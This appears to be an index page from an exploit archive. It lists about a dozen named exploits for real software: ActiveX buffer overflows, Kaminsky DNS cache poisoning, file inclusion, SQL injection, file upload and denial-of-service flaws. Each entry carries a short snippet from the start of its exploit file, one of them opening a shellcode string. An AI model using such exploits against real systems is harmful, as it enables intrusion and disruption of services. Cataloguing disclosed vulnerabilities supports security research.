Exploit
-
Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit
<!-- Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploitwritten by e.b.Tested on Windows XP SP2(fully patched) English, IE6 IE7, OfficeScan 7.3 patch 4, OfficeScanRemoveCtrl.dll version 7.3.0.1020The cont...
-
Simple DNS Plus
#!/usr/bin/perl# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit## usage: sdns-dos.pl <dns server> <dns source port> <num of packets># Exploit written by Exodus.# http://www.blackhat.org.iluse IO...
-
Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
####################################################################### Facebook Newsroom Application Remote File Inclusion Vulnerability######################################################################## Discovered by :...
-
NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
-----------------------------------------------------------------------------NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflowurl: http://www.nctsoft.com Author: shinnaimail: shinnai[at]autistici[dot]orgsite: http://www.shi...
-
BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
/** Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack** Compilation:* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm** Dependency: libdnet (aka libdumbnet-dev under Ubuntu)** Author:...
-
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==----== Wizi Wiki Wig Local File Inclusion Vulnerability ==----== ========================================================= ==--[*] Discovered By: StAkeR ~ StAkeR@...
-
Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
#!/usr/bin/python## _____ _ _ _____ _____ _____ _____# / ___| |_| | _ | _ | _ |_ _|# | (___| _ | [_)_/| (_) | (_) | | |# _____|_| |_|_| |_||_____|_____| |_|# C. H. R. O. O. T. SECURITY GROUP#...
-
File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection ||________________________________________|Download from: http://upoint.info/cgi/demo/fs/filestore.zip- Need admin rights:/confirm.php:[code]if(isset($_GET["folder&...
-
Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus....
-
Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
#!/usr/bin/python"""Oracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.Sometimes you need 2 shoots to crash OID...
-
Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2><h3>SaO</h3><h4>BiyoSecurityTeam || www.biyosecurity.com</h4><i>Plugin URI: http://...
-
CoolPlayer m3u File Local Buffer Overflow Exploit
#!/usr/bin/perl# k`sOSe - 07/29/2008use warnings;use strict;# http://www.metasploit.com# EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe# [*] x86/shikata_ga_nai succeeded, final size 169my $shellcode = "xd9xcaxd9x74x24xf4x5...
-
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/****** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.**** Based on exploit by Koshi (written in Perl). This one should be more** stable. Just for fun and to learn more about win32 exploitation.**** by Wo...
